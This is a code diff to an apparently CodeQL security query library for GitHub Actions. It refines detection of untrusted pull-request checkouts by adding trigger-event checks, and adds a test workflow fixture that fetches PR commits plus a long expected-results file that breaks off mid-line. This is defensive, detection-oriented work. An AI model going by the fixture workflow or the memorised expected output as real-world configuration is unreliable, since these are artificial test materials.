++++++++++++++++++ 3 files changed, 366 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 621f4b80e1f0..ea3f4c3c269f 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -283,6 +283,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -306,6 +307,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -326,6 +328,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -348,6 +351,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml new file mode 100644 index 000000000000..8502d081a734 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml @@ -0,0 +1,20 @@ +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + if: github.event_name == 'pull_request' + steps: + - name: Check out repository code + uses: actions/checkout@v2 + + - name: Fetch base and head on PR + if: ${{ github.event.pull_request.base.sha }} + run: | + git fetch origin master ${{ github.event.pull_request.base.sha }} + git fetch origin master ${{ github.event.pull_request.head.sha }} + + - name: Check that Pull Request includes updating the Version + run: | + git show ${{ github.event.pull_request.base.sha }}:src/mplfinance/_version.py > scripts/tv0.py + git show ${{ github.sha }}:src/mplfinance/_version.py > scripts/tv1.py + python scripts/version_update_check.py tv0 tv1 diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual new file mode 100644 index 000000000000..1ed39f73a485 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual @@ -0,0 +1,342 @@ +edges +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | +| .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:22:40 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning53.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:16:9:18:40 | Run Step | +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning81.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning81.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | +| .github/workflows/artifactpoisoning82.yml:14:9:16:6 | Run Step | .github/workflows/artifactpoisoning82.yml:16:9:22:2 | Uses Step | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:9:31:28 | Run Step | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:18:9:19:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:16:9:19:59 | Run Step: pr_number | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | +| .github/workflows/auto_ci.yml:27:9:32:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | +| .github/workflows/auto_ci.yml:37:9:40:6 | Run Step | .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | +| .github/workflows/auto_ci.yml:40:9:44:6 | Run Step | .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | +| .github/workflows/auto_ci.yml:44:9:48:6 | Run Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | +| .github/workflows/auto_ci.yml:74:9:79:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | +| .github/workflows/auto_ci.yml:96:9:108:6 | Run Step: stage_files | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | +| .github/workflows/auto_ci.yml:119:9:125:6 | Run Step | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | .github/workflows/auto_ci.yml:133:9:135:20 | Run Step | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | +| .github/workflows/dependabot1.yml:19:9:23:6 | Run Step: nvm | .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | +| .github/workflows/dependabot1.yml:23:9:28:6 | Uses Step | .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | +| .github/workflows/dependabot1.yml:28:9:31:6 | Run Step | .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | +| .github/workflows/dependabot1.yml:31:9:34:6 | Run Step | .github/workflows/dependabot1.yml:34:9:36:2 | Run Step | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | .github/workflows/dependabot1.yml:43:9:45:29 | Uses Step | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | +| .github/workflows/dependabot2.yml:38:9:42:6 | Run Step: nvm | .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | +| .github/workflows/dependabot2.yml:42:9:47:6 | Uses Step | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | +| .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | +| .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | +| .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | +| .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:48:9:52:57 | Run Step | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | +| .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:11:9:24:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | +| .github/workflows/issue_comment_heuristic.yml:24:9:28:6 | Run Step: get-sha | .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | +| .github/workflows/issue_comment_heuristic.yml:37:7:48:4 | Run Step: vars | .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | +| .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | +| .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | +| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step | +| .github/workflows/level0.yml:103:9:107:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | +| .github/workflows/level0.yml:129:9:133:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | +| .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | +| .github/workflows/pr-workflow.yml:57:9:60:6 | Uses Step | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | +| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | +| .github/workflows/pr-workflow.yml:70:9:78:6 | Uses Step | .github/workflows/pr-workflow.yml:78:9:81:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | +| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | .github/workflows/pr-workflow.yml:124:9:126:2 | Run Step | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | +| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | +| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | +| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | +| .github/workflows/pr-workflow.yml:154:9:158:6 | Run Step | .github/workflows/pr-workflow.yml:158:9:196:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:209:9:216:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:227:9:230:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:243:9:250:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:261:9:265:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:277:9:284:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:295:9:298:2 | Run Step: ok | +| .github/workflows/pr-workflow.yml:309:9:314:6 | Run Step | .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | +| .github/workflows/pr-workflow.yml:314:9:318:6 | Run Step | .github/workflows/pr-workflow.yml:318:9:323:2 | Run Step | +| .github/workflows/pr-workflow.yml:337:9:343:6 | Uses Step | .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | +| .github/workflows/pr-workflow.yml:343:9:346:6 | Uses Step | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | +| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | +| .github/workflows/pr-workflow.yml:351:9:355:6 | Run Step | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | +| .github/workflows/pr-workflow.yml:380:9:386:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | +| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | +| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | +| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | +| .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | +| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | +| .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | +| .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:33:9:35:6 | Run Step | +| .github/workflows/test3.yml:33:9:35:6 | Run Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:25:7:31:4 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | +| .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | +| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | +| .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | +| .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | +| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | +| .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:24:9:27:6 | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | +| 